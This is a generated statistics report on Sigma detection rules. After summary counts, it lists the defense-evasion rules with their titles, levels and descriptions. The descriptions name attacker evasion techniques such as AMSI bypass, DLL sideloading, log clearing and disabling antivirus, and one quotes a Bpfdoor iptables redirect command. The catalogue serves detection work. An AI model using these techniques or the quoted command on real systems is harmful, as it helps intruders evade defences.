SigmaTACT - MITRE Tactics and Techniques Report

Summary

This report contains statistical analysis of MITRE Tactics, Techniques, Sub-techniques, Log Sources, and Levels extracted from Sigma rules. Each section provides detailed counts and visualizations to help understand the distribution and frequency of security techniques.



Total Rules Processed: 3721


Total Mitre Tactics Processed: 14


Total Mitre Techniques Processed: 215


Total Mitre Sub Techniques Processed: 232


Total Mitre Other Techniques Processed: 137


Total Log Sources Processed: 47

Top MITRE Tactics

TacticCountRule TitleCount Bar
attack.defense_evasion 1394
Show Rules (1394)
Title Level Description
CobaltStrike Malleable Amazon Browsing Traffic ProfilehighDetects Malleable Amazon Profile
CobaltStrike Malformed UAs in Malleable ProfilescriticalDetects different malformed user agents used in Malleable Profiles used with Cobalt Strike
CobaltStrike Malleable (OCSP) ProfilehighDetects Malleable (OCSP) Profile with Typo (OSCP) in URL
CobaltStrike Malleable OneDrive Browsing Traffic ProfilehighDetects Malleable OneDrive Profile
Suspicious CLR Logs CreationhighDetects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.
Suspicious Load of Advapi31.dllinformationalDetects the load of advapi31.dll by a process running in an uncommon folder
SCM DLL SideloadmediumDetects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system
Svchost DLL Search Order HijackhighDetects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services "svchost.exe -k netsvcs" to gain code execution on a remote machine.
Possible Process Hollowing Image LoadinghighDetects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz
Execution via CL_Invocation.ps1 - PowershellhighDetects Execution via SyncInvoke in CL_Invocation.ps1 module
Execution via CL_Mutexverifiers.ps1highDetects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
SyncAppvPublishingServer Execution to Bypass Powershell RestrictionmediumDetects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
SyncAppvPublishingServer Execution to Bypass Powershell RestrictionmediumDetects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
Suspicious In-Memory Module ExecutionlowDetects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious.
Potential NT API Stub PatchingmediumDetects potential NT API stub patching as seen used by the project PatchingAPI
Suspicious Certutil Command UsagehighDetects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
Cmd Stream RedirectionmediumDetects the redirection of an alternate data stream (ADS) of / within a Windows command line session
Indirect Command Exectuion via ForfilesmediumDetects execition of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting.
Indirect Command ExecutionlowDetect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).
Invoke-Obfuscation RUNDLL LAUNCHERmediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Use Rundll32highDetects Obfuscated Powershell via use Rundll32 in Scripts
New Lolbin Process by Office ApplicationshighThis rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.
Monitoring Wuauclt.exe For Lolbas Execution Of DLLmediumAdversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL.
Abusing Findstr for Defense EvasionmediumAttackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism
Execute MSDT.EXE Using Diagcab FilehighDetects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190
Process Memory Dumped Via RdrLeakDiag.EXEhighDetects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory
Application Whitelisting Bypass via DLL Loaded by odbcconf.exemediumDetects defence evasion attempt via odbcconf.exe execution to load DLL
Excel Proxy Executing Regsvr32 With PayloadhighExcel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
Excel Proxy Executing Regsvr32 With Payload AlternatehighExcel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
Office Applications Spawning Wmi Cli AlternatehighInitial execution of malicious document calls wmic to execute the file with regsvr32
Possible Applocker BypasslowDetects execution of executables that can be used to bypass Applocker whitelisting
PowerShell AMSI Bypass PatternhighDetects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.
Base64 Encoded Listing of ShadowcopyhighDetects base64 encoded listing Win32_Shadowcopy
Malicious Base64 Encoded Powershell Invoke CmdletshighDetects base64 encoded powershell cmdlet invocation of known suspicious cmdlets
Potential PowerShell Base64 Encoded ShellcodemediumDetects potential powershell Base64 encoded Shellcode
Suspicious Bitsadmin Job via PowerShellhighDetect download by BITS jobs via PowerShell
Stop Or Remove Antivirus ServicehighDetects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services. Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service
Potential Xor Encoded PowerShell CommandmediumDetects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection
Regsvr32 AnomalyhighDetects various anomalies in relation to regsvr32.exe
Renamed PaExec ExecutionmediumDetects execution of renamed paexec via imphash and executable product string
Renamed PsExechighDetects the execution of a renamed PsExec often used by attackers or malware
Renamed PowerShellhighDetects the execution of a renamed PowerShell often used by attackers or malware
Root Certificate InstalledmediumAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
Rundll32 JS RunHTMLApplication PatternhighDetects suspicious command line patterns used when rundll32 is used to run JavaScript code
Suspicious Rundll32 Script in CommandLinemediumDetects suspicious process related to rundll32 based on arguments
Suspicious Execution of Sc to Delete AV ServiceshighDetects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection
Suspicious Characters in CommandLinehighDetects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion
Squirrel LolbinmediumDetects Possible Squirrel Packages Manager as Lolbin
Winword.exe Loads Suspicious DLLmediumDetects Winword.exe loading a custom DLL using the /l flag
WMI Execution Via Office ProcessmediumInitial execution of malicious document calls wmic to execute the file with regsvr32
Windows Update Client LOLBINhighDetects code execution via the Windows Update client (wuauclt)
Sysinternals SDelete Registry KeysmediumA General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.
Abusing Windows Telemetry For Persistence - RegistryhighWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
User Account Hidden By RegistryhighDetect modification for a specific user to prevent that user from being listed on the logon screen
Service Binary in Uncommon FoldermediumDetect the creation of a service with a service binary located in a uncommon directory
Disable Microsoft Office Security FeatureshighDisable Microsoft Office Security Features by registry
Office Security Settings ChangedhighDetects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)
Windows Defender Threat Detection DisabledhighDetects disabling Windows Defender threat protection
Suspicious Esentutl UsehighDetects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
New Service Uses Double Ampersand in PathhighDetects a service installation that uses a suspicious double ampersand used in the image path value
OpenCanary - HTTPPROXY Login AttempthighDetects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.
AWS CloudTrail Important ChangemediumDetects disabling, deleting and updating of a Trail
Malicious Usage Of IMDS Credentials Outside Of AWS InfrastructurehighDetects when an instance identity has taken an action that isn't inside SSM. This can indicate that a compromised EC2 instance is being used as a pivot point.
AWS Config Disabling Channel/RecorderhighDetects AWS Config Service disabling
SES Identity Has Been DeletedmediumDetects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities
AWS GuardDuty Important ChangehighDetects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.
AWS SecurityHub Findings EvasionhighDetects the modification of the findings on SecurityHub.
Azure Active Directory Hybrid Health AD FS New ServermediumThis detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.
Azure Active Directory Hybrid Health AD FS Service DeletemediumThis detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.
Azure Application DeletedmediumIdentifies when a application is deleted in Azure.
Azure Firewall Modified or DeletedmediumIdentifies when a firewall is created, modified, or deleted.
Azure Firewall Rule Collection Modified or DeletedmediumIdentifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.
Azure Kubernetes Events DeletedmediumDetects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.
Azure Network Firewall Policy Modified or DeletedmediumIdentifies when a Firewall Policy is Modified or Deleted.
Azure Owner Removed From Application or Service PrincipalmediumIdentifies when a owner is was removed from a application or service principal in Azure.
Azure Service Principal CreatedmediumIdentifies when a service principal is created in Azure.
Azure Service Principal RemovedmediumIdentifies when a service principal was removed in Azure.
CA Policy Removed by Non Approved ActormediumMonitor and alert on conditional access changes where non approved actor removed CA Policy.
CA Policy Updated by Non Approved ActormediumMonitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare "old" vs "new" value.
New CA Policy by Non-approved ActormediumMonitor and alert on conditional access changes.
Bitlocker Key RetrievalmediumMonitor and alert for Bitlocker key retrieval.
Account Created And Deleted Within A Close Time FramehighDetects when an account was created and deleted in a short period of time.
Changes to Device Registration PolicyhighMonitor and alert for changes to the device registration policy.
Users Added to Global or Device Admin RoleshighMonitor and alert for users added to device admin roles.
Change to Authentication MethodmediumChange to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.
User Added To Group With CA Policy Modification AccessmediumMonitor and alert on group membership additions of groups that have CA policy modification access
User Removed From Group With CA Policy Modification AccessmediumMonitor and alert on group membership removal of groups that have CA policy modification access
Guest User Invited By Non Approved InvitersmediumDetects when a user that doesn't have permissions to invite a guest user attempts to invite one.
User Added To Privilege RolehighDetects when a user is added to a privileged role.
Activity From Anonymous IP AddresshighIdentifies that users were active from an IP address that has been identified as an anonymous proxy IP address.
Atypical TravelhighIdentifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.
Impossible TravelhighIdentifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.
Suspicious Inbox Forwarding Identity ProtectionhighIndicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address
Suspicious Inbox Manipulation RuleshighDetects suspicious rules that delete or move messages or folders are set on a user's inbox.
Suspicious Browser ActivityhighIndicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser
Azure AD Threat IntelligencehighIndicates user activity that is unusual for the user or consistent with known attack patterns.
New CountryhighDetects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
Unfamiliar Sign-In PropertieshighDetects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.
Increased Failed Authentications Of Any TypemediumDetects when sign-ins increased by 10% or greater.
Measurable Increase Of Successful AuthenticationslowDetects when successful sign-ins increased by 10% or greater.
Device Registration or Join Without MFAmediumMonitor and alert for device registration or join events where MFA was not performed.
Suspicious SignIns From A Non Registered DevicehighDetects risky authentication from a non AD registered device without MFA being required.
Sign-ins from Non-Compliant DeviceshighMonitor and alert for sign-ins where the device was non-compliant.
Sign-ins by Unknown DeviceslowMonitor and alert for Sign-ins by unknown devices from non-Trusted locations.
Application Using Device Code Authentication FlowmediumDevice code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.
Applications That Are Using ROPC Authentication FlowmediumResource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.
Bitbucket Global Secret Scanning Rule DeletedmediumDetects Bitbucket global secret scanning rule deletion activity.
Bitbucket Global SSH Settings ChangedmediumDetects Bitbucket global SSH access configuration changes.
Bitbucket Audit Log Configuration UpdatedmediumDetects changes to the bitbucket audit log configuration.
Bitbucket Project Secret Scanning Allowlist AddedlowDetects when a secret scanning allowlist rule is added for projects.
Bitbucket Secret Scanning Exempt Repository AddedhighDetects when a repository is exempted from secret scanning feature.
Bitbucket Secret Scanning Rule DeletedlowDetects when secret scanning rule is deleted for the project or repository.
Bitbucket User Login FailuremediumDetects user authentication failure events. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.
Cisco Duo Successful MFA Authentication Via Bypass CodemediumDetects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.
GCP Break-glass Container Workload DeployedmediumDetects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.
Google Cloud Firewall Modified or DeletedmediumDetects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).
Github High Risk Configuration DisabledhighDetects when a user disables a critical security feature for an organization.
Github New Secret CreatedlowDetects when a user creates action secret for the organization, environment, codespaces or repository.
Github Push Protection Bypass DetectedlowDetects when a user bypasses the push protection on a secret detected by secret scanning.
Github Push Protection DisabledhighDetects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.
Github Secret Scanning Feature DisabledhighDetects if the secret scanning feature is disabled for an enterprise or repository.
Github Self Hosted Runner Changes DetectedlowA self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.
Azure Login Bypassing Conditional Access PolicieshighDetects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and InTune device trust using a tool like TokenSmith.
Okta MFA Reset or DeactivatedmediumDetects when an attempt at deactivating or resetting MFA.
Okta User Session Start Via An Anonymising Proxy ServicehighDetects when an Okta user session starts where the user is behind an anonymising proxy service.
Auditing Configuration Changes on Linux HosthighDetect changes in auditd configuration files
Binary Padding - LinuxhighAdversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.
Bpfdoor TCP Ports RedirectmediumAll TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392' The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.
File Time Attribute Change - LinuxmediumDetect file time attribute change to hide new or changes to existing files.
Remove Immutable File Attribute - AuditdmediumDetects removing immutable file attribute.
Disable System FirewallhighDetects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.
File or Folder Permissions ChangelowDetects file and folder permission changes.
Use Of Hidden Paths Or FileslowDetects calls to hidden files or files located in hidden directories in NIX systems.
Hidden Files and DirectorieslowDetects adversary creating hidden file or directory, by detecting directories or files with . as the first character
Steganography Hide Zip Information in Picture FilelowDetects appending of zip file to image
Modification of ld.so.preloadhighIdentifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.
Logging Configuration Changes on Linux HosthighDetect changes of syslog daemons configuration files
Masquerading as Linux Crond ProcessmediumMasquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
Modify System FirewallmediumDetects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. Detection rules that match only on the disabling of firewalls will miss this.
Steganography Hide Files with SteghidelowDetects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.
Steganography Extract Files with SteghidelowDetects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.
Steganography Unzip Hidden Information From Picture FilelowDetects extracting of zip file from image file
Potential Suspicious BPF Activity - LinuxhighDetects the presence of "bpf_probe_write_user" BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system.
Linux Command History TamperinghighDetects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".
Disabling Security Tools - BuiltinmediumDetects disabling security tools
Triple Cross eBPF Rootkit Default LockFilehighDetects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
Triple Cross eBPF Rootkit Default PersistencehighDetects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
Decode Base64 Encoded TextlowDetects usage of base64 utility to decode arbitrary base64-encoded text
Linux Base64 Encoded Pipe to ShellmediumDetects suspicious process command line that uses base64 encoded input for execution with a shell
Enable BPF Kprobes TracingmediumDetects common command used to enable bpf kprobes tracing
Remove Immutable File AttributemediumDetects usage of the 'chattr' utility to remove immutable file attribute.
Linux Base64 Encoded Shebang In CLImediumDetects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
Clear Linux LogsmediumDetects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
Commands to Clear or Remove the SysloghighDetects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks
Remove Scheduled Cron Task/JobmediumDetects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
Potential Linux Process Code Injection Via DD UtilitymediumDetects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
Ufw Force Stop Using Ufw-InitmediumDetects attempts to force stop the ufw using ufw-init
ESXi Syslog Configuration Change Via ESXCLImediumDetects changes to the ESXi syslog configuration via "esxcli"
File DeletioninformationalDetects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
Install Root CertificatelowDetects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
Suspicious Package Installed - LinuxmediumDetects installation of suspicious packages using system installation utilities
Flush Iptables Ufw ChainmediumDetect use of iptables to flush all firewall rules, tables and chains and allow all network traffic
Connection ProxylowDetects setting proxy configuration
Linux Package UninstalllowDetects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
Disabling Security ToolsmediumDetects disabling security tools
Disable Or Stop ServicesmediumDetects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
Chmod Suspicious DirectorymediumDetects chmod targeting files in abnormal directory paths.
Potentially Suspicious Execution From Tmp FolderhighDetects a potentially suspicious execution of a process located in the '/tmp/' folder
Interactive Bash Suspicious ChildrenmediumDetects suspicious interactive bash as a parent to rather uncommon child processes
Linux Shell Pipe to ShellmediumDetects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
Touch Suspicious Service FilemediumDetects usage of the "touch" process in service file.
Triple Cross eBPF Rootkit Execve HijackhighDetects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
Triple Cross eBPF Rootkit Install CommandshighDetects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
Decode Base64 Encoded Text -MacOslowDetects usage of base64 utility to decode arbitrary base64-encoded text
Binary Padding - MacOShighAdversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.
File Time Attribute ChangemediumDetect file time attribute change to hide new or changes to existing files
Hidden Flag Set On File/Directory Via Chflags - MacOSmediumDetects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
Indicator Removal on Host - Clear Mac System LogsmediumDetects deletion of local audit logs
Hidden User CreationmediumDetects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option
Disable Security ToolsmediumDetects disabling security tools
File Download Via Nscurl - MacOSmediumDetects the execution of the nscurl utility in order to download files.
Payload Decoded and Decrypted via Built-in UtilitiesmediumDetects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
Space After Filename - macOSlowDetects attempts to masquerade as legitimate files by adding a space to the end of the filename.
Suspicious Execution via macOS Script EditormediumDetects when the macOS Script Editor utility spawns an unusual child process.
System Information Discovery Via Sysctl - MacOSmediumDetects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. This process is primarily used to detect and avoid virtualization and analysis environments.
System Information Discovery Using System_ProfilermediumDetects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
Potential Base64 Decoded From ImageshighDetects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.
Gatekeeper Bypass via XattrlowDetects macOS Gatekeeper bypass via xattr utility
Cisco Clear LogshighClear command history in network OS which is used for defense evasion
Cisco Crypto CommandshighShow when private keys are being exported from the device, or when new certificates are installed
Cisco Disabling LogginghighTurn off logging locally or remote
Cisco File DeletionmediumSee what files are being deleted from flash file systems
Cisco BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing
Cisco LDP Authentication FailureslowDetects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
Huawei BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing.
Juniper BGP Missing MD5lowDetects juniper BGP missing MD5 digest. Which may be indicative of brute force attacks to manipulate routing.
Download from Suspicious Dyndns HostsmediumDetects download of certain file types from hosts with dynamic DNS names (selected list)
HackTool - CobaltStrike Malleable Profile Patterns - ProxyhighDetects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).
HackTool - Empire UserAgent URI CombohighDetects user agent and URI paths used by empire agents
Raw Paste Service AccesshighDetects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
Flash Player Update from Suspicious LocationhighDetects a flashplayer update from an unofficial location
Telegram API AccessmediumDetects suspicious requests to Telegram API without the usual Telegram User-Agent
Bitsadmin to Uncommon IP Server AddresshighDetects Bitsadmin connections to IP addresses instead of FQDN names
Bitsadmin to Uncommon TLDhighDetects Bitsadmin connections to domains with uncommon TLDs
HTTP Request With Empty User AgentmediumDetects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method.
Windows PowerShell User AgentmediumDetects Windows PowerShell Web Access
Server Side Template Injection StringshighDetects SSTI attempts sent via GET requests in access logs
Microsoft Malware Protection Engine CrashhighThis rule detects a suspicious crash of the Microsoft Malware Protection Engine
Audit CVE EventcriticalDetects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
Backup Catalog DeletedmediumDetects backup catalog deletions
Restricted Software Access By SRPhighDetects restricted access to applications by the Software Restriction Policies (SRP) policy
MSI Installation From WebmediumDetects installation of a remote msi file from web.
MSSQL Disable Audit SettingshighDetects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server
Microsoft Malware Protection Engine Crash - WERhighThis rule detects a suspicious crash of the Microsoft Malware Protection Engine
Sysinternals Tools AppX Versions ExecutionlowDetects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths
Deployment AppX Package Was Blocked By AppLockermediumDetects an appx package deployment that was blocked by AppLocker policy
Potential Malicious AppX Package Installation AttemptsmediumDetects potential installation or installation attempts of known malicious appx packages
Deployment Of The AppX Package Was Blocked By The PolicymediumDetects an appx package deployment that was blocked by the local computer policy
Suspicious AppX Package Installation AttemptmediumDetects an appx package installation with the error code "0x80073cff" which indicates that the package didn't meet the signing requirements and could be suspicious
Suspicious Remote AppX Package LocationshighDetects an appx package added to the pipeline of the "to be processed" packages which was downloaded from a suspicious domain.
Suspicious AppX Package LocationshighDetects an appx package added the pipeline of the "to be processed" packages which is located in suspicious locations
Uncommon AppX Package LocationsmediumDetects an appx package added the pipeline of the "to be processed" packages which is located in uncommon locations
Suspicious Digital Signature Of AppX PackagemediumDetects execution of AppX packages with known suspicious or malicious signature
New BITS Job Created Via BitsadminlowDetects the creation of a new bits job by Bitsadmin
New BITS Job Created Via PowerShelllowDetects the creation of a new bits job by PowerShell
BITS Transfer Job Downloading File Potential Suspicious ExtensionmediumDetects new BITS transfer job saving local files with potential suspicious extensions
BITS Transfer Job Download From File Sharing DomainshighDetects BITS transfer job downloading files from a file sharing domain.
BITS Transfer Job Download From Direct IPhighDetects a BITS transfer job downloading file(s) from a direct IP address.
BITS Transfer Job With Uncommon Or Suspicious Remote TLDmediumDetects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.
BITS Transfer Job Download To Potential Suspicious FolderhighDetects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location
DNS Server Error Failed Loading the ServerLevelPluginDLLhighDetects a DNS server error in which a specified plugin DLL (in registry) could not be loaded
Uncommon New Firewall Rule Added In Windows Firewall Exception ListmediumDetects when a rule has been added to the Windows Firewall exception list
New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious ApplicationhighDetects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.
New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXEmediumDetects the addition of a new "Allow" firewall rule by the WMI process (WmiPrvSE.EXE). This can occur if an attacker leverages PowerShell cmdlets such as "New-NetFirewallRule", or directly uses WMI CIM classes such as "MSFT_NetFirewallRule".
All Rules Have Been Deleted From The Windows Firewall ConfigurationhighDetects when a all the rules have been deleted from the Windows Defender Firewall configuration
A Rule Has Been Deleted From The Windows Firewall Exception ListmediumDetects when a single rules or all of the rules have been deleted from the Windows Defender Firewall
The Windows Defender Firewall Service Failed To Load Group PolicylowDetects activity when The Windows Defender Firewall service failed to load Group Policy
Windows Defender Firewall Has Been Reset To Its Default ConfigurationlowDetects activity when Windows Defender Firewall has been reset to its default configuration
Windows Firewall Settings Have Been ChangedlowDetects activity when the settings of the Windows firewall have been changed
ETW Logging/Processing Option Disabled On IIS ServermediumDetects changes to of the IIS server configuration in order to disable/remove the ETW logging/processing option.
HTTP Logging Disabled On IIS ServerhighDetects changes to of the IIS server configuration in order to disable HTTP logging for successful requests.
New Module Module Added To IIS ServermediumDetects the addition of a new module to an IIS server.
Previously Installed IIS Module Was RemovedlowDetects the removal of a previously installed IIS module.
Remove Exported Mailbox from Exchange WebserverhighDetects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit
Add or Remove Computer from DClowDetects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.
AD Object WriteDAC AccesscriticalDetects WRITE_DAC access to a domain object
Weak Encryption Enabled and KerberoasthighDetects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.
Security Eventlog ClearedhighOne of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution
Failed Code Integrity ChecksinformationalDetects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.
Windows Event Auditing DisabledlowDetects scenarios where system auditing (i.e.: Windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed. Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc". Please note, that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways.
Important Windows Event Auditing DisabledhighDetects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled.
ETW Logging Disabled In .NET Processes - RegistryhighPotential adversaries stopping ETW providers recording loaded .NET assemblies.
HackTool - EDRSilencer Execution - Filter AddedhighDetects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.
Invoke-Obfuscation CLIP+ Launcher - SecurityhighDetects Obfuscated use of Clip.exe to execute PowerShell
